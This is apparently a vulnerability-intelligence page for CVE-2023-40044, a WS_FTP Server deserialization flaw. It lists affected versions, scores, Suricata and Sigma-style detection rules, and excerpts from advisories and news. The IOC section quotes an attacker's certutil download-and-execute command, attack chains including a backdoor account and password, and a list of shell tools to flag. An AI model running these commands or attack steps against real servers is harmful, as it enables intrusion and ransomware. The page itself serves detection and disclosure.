CVE-2023-40044
published 2023-09-27CVE-2023-40044: In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer…
PriorityP198high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2023-10-26
Exploited in the wild
EPSS
90.15%
99.8th percentile
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| progress | ws_ftp_server | < 8.7.4 | 8.7.4 |
| progress | ws_ftp_server | >= 8.8 < 8.8.2 | 8.8.2 |
| progress_software_corporation | ws_ftp_server | >= 8.7.0 < 8.7.4 | 8.7.4 |
| progress_software_corporation | ws_ftp_server | >= 8.8.0 < 8.8.2 | 8.8.2 |
Detection & IOCsextracted from sources · hover to see the quote
command/c certutil -urlcache -f hxxp://103[.]163[.]187[.]12:8080/{22-length-alphanumeric-string} %TEMP%\{10-length-alpha-string}.exe & start /B %TEMP%\{same-10-length-alpha-string}.exe↗
sigma↗
endpoint.os = 'windows' AND event.category = 'process' AND src.process.name in:anycase ('w3wp.exe') AND src.process.cmdline contains 'WSFTPSVR_WTM' AND tgt.process.cmdline contains ('certutil', 'mshta', 'powershell', 'pwsh', 'cmd', 'curl', 'wmic', 'nslookup', 'ping', 'whoami')- →Post-exploitation Attack Chain 1: w3wp.exe (WSFTPSVR_WTM) spawns PowerShell that decodes a Base64/Gzip payload, then uses certutil with -urlcache -f to download and execute a payload from an IP-literal URL on port 8080. ↗
- →Post-exploitation Attack Chain 2: w3wp.exe spawns curl to download cl.exe from attacker-controlled infrastructure, then executes it. Also uses tmpfiles.org and oastify.com (Burp Collaborator) domains for payload delivery and OOB callback. ↗
- →Post-exploitation Attack Chain 3: Attacker drops executables (n1.exe, n2.exe, s.exe, xmpp.exe, ft.exe) to C:\ProgramData, creates a local admin account named 'temp' with password 'p@ssw0rd123', and uses nslookup for OOB DNS callbacks to oastify.com subdomains. ↗
- →Rapid7 observed the same Burp Suite (oastify.com) domain used across all incidents, suggesting a single threat actor or shared tooling. Oastify.com subdomains in DNS/network logs are a strong indicator of exploitation activity. ↗
- →The process execution chain is consistent across all observed exploitation instances, indicating likely mass exploitation. The parent process is always w3wp.exe with the WSFTPSVR_WTM application pool. ↗
- →Ransomware actors used the open-source GodPotato tool for privilege escalation to NT AUTHORITY\SYSTEM after exploiting CVE-2023-40044. Monitor for GodPotato execution following w3wp.exe activity. ↗
- ·Approximately 2,900 WS_FTP hosts were internet-exposed with their webserver accessible at time of disclosure; exploitation requires the webserver component to be reachable. ↗
- ·The only complete remediation is upgrading to WS_FTP Server 8.7.4 or 8.8.2 using the full installer; partial updates are insufficient. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-29vf-j74g-gmfc: In WS_FTP Server version 8
ghsa_unreviewed·2023-09-27
CVE-2023-40044 [HIGH] CWE-502 GHSA-29vf-j74g-gmfc: In WS_FTP Server version 8
In WS_FTP Server version 8.7.0 prior to 8.7.4 and
version 8.8.0 prior to 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.
VulnCheck
Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
vulncheck·2023·CVSS 10.0
CVE-2023-40044 [CRITICAL] CWE-502 Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
Progress WS_FTP Server contains a deserialization of untrusted data vulnerability in the Ad Hoc Transfer module that allows an authenticated attacker to execute remote commands on the underlying operating system.
Affected: Progress WS_FTP Server
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.rapid7.com/blog/post/2023/09/29/etr-critical-vulnerabilities-in-ws_ftp-server/; https://www.huntress.com/blog/critical-vulnerabilities-ws-ftp-exploitation; https://cyberplace.social/@GossiTheDog/111170422410590021; https://www.cisa.gov/sites/default/files/feeds/known_exploited_v
CISA
Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
cisa·2023-10-05·CVSS 8.8
CVE-2023-40044 [HIGH] CWE-502 Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
Vulnerability: Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
Affected: Progress WS_FTP Server
Progress WS_FTP Server contains a deserialization of untrusted data vulnerability in the Ad Hoc Transfer module that allows an authenticated attacker to execute remote commands on the underlying operating system.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023; https://nvd.nist.gov/vuln/detail/CVE-2023-40044
Remediation Due Date: 2023-10-26
Suricata
ET FTP Vulnerable WS_FTP Version in FTP Banner Response (CVE-2023-40044)
suricata·2023-10-05·CVSS 10.0
CVE-2023-40044 [CRITICAL] ET FTP Vulnerable WS_FTP Version in FTP Banner Response (CVE-2023-40044)
ET FTP Vulnerable WS_FTP Version in FTP Banner Response (CVE-2023-40044)
Rule: alert tcp-pkt $HOME_NET [21,990,2100,2121,3535] -> any any (msg:"ET FTP Vulnerable WS_FTP Version in FTP Banner Response (CVE-2023-40044)"; flow:established,to_client; content:"220"; startswith; content:"WS_FTP|20|Server|20|"; fast_pattern; distance:0; pcre:"/^(8\.7\.[0-3])|(8\.[0-6]\.\d{1,})|(8\.8\.[0-1])(?:$|\x28)/R"; threshold: type limit, track by_src, seconds 3600, count 1; reference:url,www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044; reference:cve,2023-40044; classtype:network-scan; sid:2048464; rev:3; metadata:affected_product WS_FTP, attack_target FTP_Server, created_at 2023_10_05, cve CVE_2023_40044, deployment Perimeter, deployment Internal, perfo
Suricata
ET EXPLOIT WS_FTP .NET Deserialization Exploit Attempt (CVE-2023-40044)
suricata·2023-10-03·CVSS 10.0
CVE-2023-40044 [CRITICAL] ET EXPLOIT WS_FTP .NET Deserialization Exploit Attempt (CVE-2023-40044)
ET EXPLOIT WS_FTP .NET Deserialization Exploit Attempt (CVE-2023-40044)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT WS_FTP .NET Deserialization Exploit Attempt (CVE-2023-40044)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/AHT/AhtApiService.asmx/AuthUser"; fast_pattern; http.content_type; content:"multipart/form-data|3b|"; startswith; http.request_body; content:"Content-Disposition|3a 20|form-data|3b 20|name|3d|"; content:!"|3b 20|filename|3d|"; within:400; reference:cve,2023-40044; reference:url,www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044; classtype:attempted-admin; sid:2048383; rev:1; metadata:affected_product WS_FTP, attack_target FTP_Server, created_at 20
Metasploit
Progress Software WS_FTP Unauthenticated Remote Code Execution
metasploit
Progress Software WS_FTP Unauthenticated Remote Code Execution
Progress Software WS_FTP Unauthenticated Remote Code Execution
This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.
Nuclei
WS_FTP Server - Insecure Deserialization
nuclei·CVSS 8.8
CVE-2023-40044 [HIGH] WS_FTP Server - Insecure Deserialization
WS_FTP Server - Insecure Deserialization
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.
Template:
id: CVE-2023-40044
info:
name: WS_FTP Server - Insecure Deserialization
author: 0x_Akoko
severity: critical
description: |
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.
impact: |
Unauthenticated attackers can exploit .NET deserialization vulnerability in the Ad Hoc Transfer module to execute arbitrary commands
Wiz
Crying Out Cloud - November Newsletter | Wiz
blogs_wiz·2023-11-01·CVSS 9.8
CVE-2023-42115 [CRITICAL] Crying Out Cloud - November Newsletter | Wiz
The past month has brought a series of vulnerabilities and security incidents that have left users affected. Amidst the noise, we've taken it upon ourselves to curate the most significant developments for you.
Here are our top picks of cloud security highlights!
## 🐞 High Profile Vulnerabilities
## Critical and high severity 0day vulnerabilities in Exim
Multiple vulnerabilities were disclosed in Exim Mail Transfer Agent (MTA), including CVE-2023-42115, which is a critical vulnerability enabling unauthenticated attackers to remotely execute code on publicly exposed Exim servers with a specific non-default configuration. This issue results from improper input validation that leads to writing arbitrary code past the end of the buffer.
According to Wiz data, although Exim is very prevalen
Bleepingcomputer
Ransomware attacks now target unpatched WS_FTP servers
blogs_bleepingcomputer·2023-10-12·CVSS 10.0
[CRITICAL] Ransomware attacks now target unpatched WS_FTP servers
## Ransomware attacks now target unpatched WS_FTP servers
## Sergiu Gatlan
Internet-exposed WS_FTP servers unpatched against a maximum severity vulnerability are now targeted in ransomware attacks.
As recently observed by Sophos X-Ops incident responders, threat actors self-described as the Reichsadler Cybercrime Group attempted, unsuccessfully, to deploy ransomware payloads created using a LockBit 3.0 builder stolen in September 2022.
"The ransomware actors didn't wait long to abuse the recently reported vulnerability in WS_FTP Server software," Sophos X-Ops said .
"Even though Progress Software released a fix for this vulnerability in September 2023, not all of the servers have been patched. Sophos X-Ops observed unsuccessful attempts to deploy ransomware through the unpatched servi
Sentinelone
Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains
blogs_sentinelone·2023-10-09·CVSS 10.0
CVE-2023-40044 [CRITICAL] Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains
Starting on September 30, 2023, SentinelOne has observed actors exploiting the recently disclosed flaws in Progress’ WS_FTP against Windows servers running a vulnerable version of the software. The two highest severity vulnerabilities–CVE-2023-40044 and CVE-2023-42657–were assigned a CVSS score of 10 and 9.9, respectively. We observed at least three types of multi-stage attack chains, which begin with exploitation, and then commands to download a payload from a remote server, often via an IP-literal URL.
This active, in-the-wild exploitation marks the third wave of attacks against a Progress Software product in 2023 . While exploitation is likely opportunistic, organizations in the Information Technology Managed Service Provider (IT MSP), Software and Technology, Legal Services, Engineeri
Sentinelone
Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains
blogs_sentinelone·2023-10-09·CVSS 10.0
CVE-2023-40044 [CRITICAL] Threat Actors Actively Exploiting Progress WS_FTP via Multiple Attack Chains
Starting on September 30, 2023, SentinelOne has observed actors exploiting the recently disclosed flaws in Progress’ WS_FTP against Windows servers running a vulnerable version of the software. The two highest severity vulnerabilities–CVE-2023-40044 and CVE-2023-42657–were assigned a CVSS score of 10 and 9.9, respectively. We observed at least three types of multi-stage attack chains, which begin with exploitation, and then commands to download a payload from a remote server, often via an IP-literal URL.
This active, in-the-wild exploitation marks the third wave of attacks against a Progress Software product in 2023. While exploitation is likely opportunistic, organizations in the Information Technology Managed Service Provider (IT MSP), Software and Technology, Legal Services, Engineerin
Talos
Is it bad to have a major security incident on your résumé? (Seriously I don’t know)
blogs_talos·2023-10-05
Is it bad to have a major security incident on your résumé? (Seriously I don’t know)
Welcome to this week’s edition of the Threat Source newsletter.
It’s Cybersecurity Awareness Month, which means it’s time to hug your nearest defender — they’re probably tired, could be facing burnout or just have had too much coffee today.
What makes the cybersecurity landscape even more fraught right now is that qualified analysts, researchers and security practitioners are having a hard time finding work. Several major security firms have recently experienced layoffs or have shut down entirely, at the same time the community is lamenting about a cybersecurity skills gap and a lack of workers.
I was watching TechCrunch’s “Disrupt” conference last week and I found it interesting that one particular panel was discussing the challenges of hiring in cybersecurity right now, and the host o
Talos
Is it bad to have a major security incident on your résumé? (Seriously I don’t know)
blogs_talos·2023-10-05
Is it bad to have a major security incident on your résumé? (Seriously I don’t know)
## Is it bad to have a major security incident on your résumé? (Seriously I don’t know)
Welcome to this week’s edition of the Threat Source newsletter.
It’s Cybersecurity Awareness Month, which means it’s time to hug your nearest defender — they’re probably tired, could be facing burnout or just have had too much coffee today.
What makes the cybersecurity landscape even more fraught right now is that qualified analysts, researchers and security practitioners are having a hard time finding work. Several major security firms have recently experienced layoffs or have shut down entirely, at the same time the community is lamenting about a cybersecurity skills gap and a lack of workers.
I was watching TechCrunch’s “Disrupt” conference last week and I found it interesting that one particular
Tenable
CVE-2023-40044, CVE-2023-42657: Progress Software Patches Multiple Vulnerabilities in WS_FTP Server
blogs_tenable·2023-10-02·CVSS 10.0
[CRITICAL] CVE-2023-40044, CVE-2023-42657: Progress Software Patches Multiple Vulnerabilities in WS_FTP Server
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Huntress
Critical Vulnerabilities: WS_FTP Exploitation | Huntress
blogs_huntress·2023-10-02·CVSS 6.1
CVE-2023-40044 [MEDIUM] Critical Vulnerabilities: WS_FTP Exploitation | Huntress
On Thursday, September 28, 2023, software vendor Progress released a security advisory for numerous vulnerabilities affecting the WS_FTP Server Ad Hoc Transfer Module within their WS_FTP software.
These vulnerabilities were disclosed as:
CVE-2023-40044 (CVSS: 10)
CVE-2023-42657 (CVSS 9.9)
CVE-2023-40045 (CVSS 8.3)
CVE-2023-40046 (CVSS 8.2)
CVE-2023-40048 (CVSS 6.8)
CVE-2022-27665 (CVSS 6.1)
CVE-2023-40049 (CVSS 5.3)
Most notable amongst these were CVE-2023-40044 and CVE-2023-42657, both critical severity issues. Throughout this past weekend, the cybersecurity industry has been chasing CVE-2023-40044 specifically.
## What We Know So Far
As disclosed by Progress , CVE-2023-40044 is the critical (CVSS: 10) remote code execution vulnerability that does not require authentication.
F
Bleepingcomputer
Exploit available for critical WS_FTP bug exploited in attacks
blogs_bleepingcomputer·2023-10-02·CVSS 10.0
CVE-2023-40044 [CRITICAL] Exploit available for critical WS_FTP bug exploited in attacks
## Exploit available for critical WS_FTP bug exploited in attacks
## Sergiu Gatlan
Over the weekend, security researchers released a proof-of-concept (PoC) exploit for a maximum severity remote code execution vulnerability in Progress Software's WS_FTP Server file sharing platform.
Assetnote researchers who discovered and reported the maximum severity flaw ( CVE-2023-40044 ) published a blog post with a PoC exploit and additional technical details on Saturday.
CVE-2023-40044 is caused by a .NET deserialization vulnerability in the Ad Hoc Transfer Module, allowing unauthenticated attackers to remotely execute commands on the underlying operating system via a simple HTTP request.
"This vulnerability turned out to be relatively straight forward and represented a typical .NET deserializat
Checkpoint
2nd October – Threat Intelligence Report
blogs_checkpoint·2023-10-02
CVE-2023-5217 2nd October – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 2nd October – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 2nd October, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Check Point researchers have detected a phishing campaign exploiting popular file-sharing program Dropbox. The threat actors use legitimate Dropbox pages to send official email messages to the victims, which will then redirect the recipients to credential stealing pages.
Japanese entertainment giant Sony, as well as major
Bleepingcomputer
Progress warns of maximum severity WS_FTP Server vulnerability
blogs_bleepingcomputer·2023-09-28·CVSS 10.0
[CRITICAL] Progress warns of maximum severity WS_FTP Server vulnerability
## Progress warns of maximum severity WS_FTP Server vulnerability
## Sergiu Gatlan
Progress Software, the maker of the MOVEit Transfer file-sharing platform recently exploited in widespread data theft attacks, warned customers to patch a maximum severity vulnerability in its WS_FTP Server software.
The company says thousands of IT teams worldwide use its enterprise-grade WS_FTP Server secure file transfer software.
In an advisory published on Wednesday, Progress disclosed multiple vulnerabilities impacting the software's manager interface and Ad hoc Transfer Module.
Out of all WS_FTP Server security flaws patched this week, two of them were rated as critical, with the one tracked as CVE-2023-40044 receiving a maximum 10/10 severity rating and allowing unauthenticated attackers to exec
Huntress
Critical Vulnerabilities: WS_FTP Exploitation | Huntress
blogs_huntress·CVSS 6.1
CVE-2023-40044 [MEDIUM] Critical Vulnerabilities: WS_FTP Exploitation | Huntress
On Thursday, September 28, 2023, software vendor Progress released a security advisory for numerous vulnerabilities affecting the WS_FTP Server Ad Hoc Transfer Module within their WS_FTP software.
These vulnerabilities were disclosed as:
- CVE-2023-40044 (CVSS: 10)
- CVE-2023-42657 (CVSS 9.9)
- CVE-2023-40045 (CVSS 8.3)
- CVE-2023-40046 (CVSS 8.2)
- CVE-2023-40048 (CVSS 6.8)
- CVE-2022-27665 (CVSS 6.1)
- CVE-2023-40049 (CVSS 5.3)
Most notable amongst these were CVE-2023-40044 and CVE-2023-42657, both critical severity issues. Throughout this past weekend, the cybersecurity industry has been chasing CVE-2023-40044 specifically.
## What We Know So Far
As disclosed by Progress, CVE-2023-40044 is the critical (CVSS: 10) remote code execution vulnerability that does not require authenticat
http://packetstormsecurity.com/files/174917/Progress-Software-WS_FTP-Unauthenticated-Remote-Code-Execution.htmlhttps://attackerkb.com/topics/bn32f9sNax/cve-2023-40044https://censys.com/cve-2023-40044/https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044https://www.progress.com/ws_ftphttps://www.rapid7.com/blog/post/2023/09/29/etr-critical-vulnerabilities-in-ws_ftp-server/https://www.theregister.com/2023/10/02/ws_ftp_update/http://packetstormsecurity.com/files/174917/Progress-Software-WS_FTP-Unauthenticated-Remote-Code-Execution.htmlhttps://attackerkb.com/topics/bn32f9sNax/cve-2023-40044https://censys.com/cve-2023-40044/https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044https://www.progress.com/ws_ftphttps://www.rapid7.com/blog/post/2023/09/29/etr-critical-vulnerabilities-in-ws_ftp-server/https://www.theregister.com/2023/10/02/ws_ftp_update/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-40044
2023-09-27
Published
2023-10-05
Added to CISA KEV
Exploited in the wild